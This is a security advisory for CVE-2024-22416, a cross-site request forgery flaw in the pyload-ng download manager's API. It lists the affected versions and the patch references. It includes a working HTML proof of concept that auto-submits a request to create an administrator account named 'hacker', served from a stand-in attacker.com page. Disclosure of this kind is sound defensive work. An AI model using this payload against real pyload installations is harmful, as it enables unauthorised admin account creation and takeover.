CVE-2024-22416

Description

### Summary The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user. ### PoC We host the following HTML file on an attacker-controlled server. ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` If we now trick an administrator into visiting our malicious page at `https://attacker.com/CSRF.html`, we see that their browser will make a request to `/api/add_user/%22hacker%22,%22hacker%22`, adding a new administrator to the `pyload` application.  The attacker can now authenticate as this newly created administrator user with the username `hacker` and password `hacker`.  ### Impact Any API call can be made via a CSRF attack by an unauthenticated user.

Affected packages (2)

• PyPI/pyload-ngfrom 0, < 0.5.0b3.dev78
• PyPI/pyload-ngfrom 0, < 1374c824271cb7e927740664d06d2e577624ca3e, < c7cdc18ad9134a75222974b39e8b427c4af845fc | from 0, < 0.5.0b3.dev78

CVSS scores

References (6)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-22416
• PATCHhttps://github.com/pyload/pyload
• WEBhttps://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e
• WEBhttps://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc
• WEBhttps://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm
• WEBhttps://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml